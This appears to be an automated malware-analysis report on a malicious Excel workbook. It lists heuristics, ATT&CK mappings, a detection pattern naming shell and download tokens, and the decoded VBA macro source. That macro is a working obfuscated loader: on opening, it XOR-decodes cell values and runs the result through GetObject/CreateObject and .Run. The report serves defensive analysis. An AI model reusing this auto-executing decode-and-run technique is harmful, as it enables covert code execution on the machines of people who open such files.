Verdict: MALICIOUS
Risk Score: 148
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
This Excel file contains VBA macros, including a Workbook_Open event, which are designed to execute code. The heuristics indicate the use of CreateObject and GetObject, suggesting the creation or manipulation of objects to run malicious code. The macro's AlphAbeticAl subroutine calls Towns.Run, which likely executes a second-stage payload. The obfuscated nature of the script prevents a more detailed analysis of the payload's exact function.
Heuristics (5)
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Set Towns = GetObject(Athletics).CreateObject(Horizontal)`
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call. Matched line in script: `Set Towns = GetObject(Athletics).CreateObject(Horizontal)`
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low) OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script: `Sub Workbook_Open()`
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4378 bytes |

SHA-256: 9441b863e94d632df9854b80400ef07e1b4214516e12130c4afd4054be60b2a1
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Towns As Object
Private Sub SuperviSion(ByVal Athletics As String, ByVal Climbing As String, ByVal Horizontal As String, ByVal Loves As String)
Coding Athletics, Horizontal
AlphAbeticAl Towns, Loves, Climbing
End Sub
Sub AlphAbeticAl(ByVal Towns As Object, ByVal Loves As String, ByVal Climbing As String)
Towns.Run Climbing, 0
End Sub
Private Function Mozilla(ByVal Loving As String) As Variant
Dim CorreCtion As Long: CorreCtion = 0: Dim Pointed() As Byte
Dim ArtificiAl() As Byte, ConneCtor As String, Selecting As Integer, TiTTen As Integer, Permits As Integer
ArtificiAl = "ub385e8cd2"
GoTo BaBies
Northeast:
If CorreCtion < UBound(Pointed) Then
Selecting = CorreCtion Mod (10)
Permits = ArtificiAl(Selecting * 2)
TiTTen = Pointed(CorreCtion)
GoTo Rapidly
SiSterS:
ConneCtor = ConneCtor & Chr(Pointed(CorreCtion))
CorreCtion = CorreCtion + 1
GoTo Northeast
Else
GoTo Genuine
End If
Genuine:
Mozilla = ConneCtor
Exit Function
BaBies:
Pointed = Verified(Loving)
GoTo Northeast
Rapidly:
Pointed(CorreCtion) = Abs(TiTTen Xor Permits)
GoTo SiSterS
End Function
Sub Coding(ByVal Athletics As String, ByVal Horizontal As String)
Set Towns = GetObject(Athletics).CreateObject(Horizontal)
End Sub
Sub Workbook_Open()
SuperviSion Mozilla(Sheets("t66de").Range("J118").Value), Mozilla(Sheets("t66de").Range("H102").Value), Mozilla(Sheets("t66de").Range("H163").Value), Mozilla(Sheets("t66de").Range("F159").Value)
End Sub
Private Function Verified(ByVal Answered As String) As Variant
Dim ConneCtor() As Byte, i As Long, Selecting As Integer, Crowd As Integer
Crowd = Len(Answered) / 2: i = 0: ReDim ConneCtor(0 To Crowd) As Byte
Permits:
If i < Len(Answered) Then
Selecting = Selecting + 1
ConneCtor(Selecting - 1) = Chr((20 - 6) + (((8 - 2) * 2) * 2)) & Chr((((32 / 4) * 2) + (4 * 5)) * 2) & Mid(Answered, i + 1, 2)
i = i + 2
GoTo Permits
Else
GoTo Kennedy
Dim Rapidly As String
Rapidly = InputBox("celp lape")
End If
Kennedy:
Verified = ConneCtor
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True